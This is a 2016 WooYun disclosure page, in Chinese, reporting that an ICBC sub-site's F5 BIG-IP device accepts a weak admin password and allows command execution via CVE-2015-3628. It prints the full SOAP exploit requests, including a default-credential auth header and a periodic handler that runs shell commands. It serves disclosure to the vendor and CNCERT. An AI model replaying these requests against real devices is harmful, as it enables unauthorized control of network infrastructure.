当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195485

漏洞标题:工商银行某分站漏洞导致命令执行

相关厂商:工商银行

漏洞作者: 白泽

提交时间:2016-04-12 18:20

修复时间:2016-05-30 16:30

公开时间:2016-05-30 16:30

漏洞类型:网络未授权访问

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-12: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

简要描述:

工商银行某分站漏洞导致命令执行,工具有点6

详细说明:

工商银行F5负载均衡网络设备由于弱口令导致命令执行,设备泄露内网IP信息,负载均衡好像能做很多事。 0.0

漏洞证明:

**.**.**.**/xui/


1、弱口令

11.jpg


2、命令执行(CVE-2015-3628)

POST /iControl/iControlPortal.cgi HTTP/1.1 
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:iControl:iCall/Script
Host: **.**.**.**:443
Content-Length: 866
Cookie: BIGIPAuthCookie=017EA784717D2DC416AFD90FB58842083DE1BD23; BIGIPAuthUsernameCookie=admin
Authorization: Basic YWRtaW46YWRtaW4=
<soapenv:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://**.**.**.**/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<scr:create soapenv:encodingStyle="http://**.**.**.**/soap/encoding/">
<scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl"><item>exploit</item></scripts>
<definitions xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl"><item>exec /bin/sh -c "id>/var/local/ucs/file.ucs;chmod a+r /var/local/ucs/file.ucs"</item></definitions>
</scr:create>
</soapenv:Body>
</soapenv:Envelope>
POST /iControl/iControlPortal.cgi HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:iControl:iCall/PeriodicHandler
Host: **.**.**.**:443
Content-Length: 923
Cookie: BIGIPAuthCookie=017EA784717D2DC416AFD90FB58842083DE1BD23; BIGIPAuthUsernameCookie=admin
Authorization: Basic YWRtaW46YWRtaW4=
<soapenv:Envelope xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance" xmlns:xsd="http://**.**.**.**/2001/XMLSchema" xmlns:soapenv="http://**.**.**.**/soap/envelope/" xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://**.**.**.**/soap/encoding/">
<soapenv:Header/>
<soapenv:Body>
<per:create soapenv:encodingStyle="http://**.**.**.**/soap/encoding/">
<handlers xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">
<item>exploitHandler</item>
</handlers>
<scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">
<item>/Common/exploit</item>
</scripts>
<intervals xsi:type="urn:Common.ULongSequence" soapenc:arrayType="xsd:long[]" xmlns:urn="urn:iControl">
<item>30</item>
</intervals>
</per:create>
</soapenv:Body>
</soapenv:Envelope>


22.jpg

修复方案:

版权声明:转载请注明来源 白泽@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-15 16:25

厂商回复:

CNVD未复现所述情况,已经转由CNCERT直接通报给对应银行集团公司,由其后续协调网站管理部门处置.

最新状态:

暂无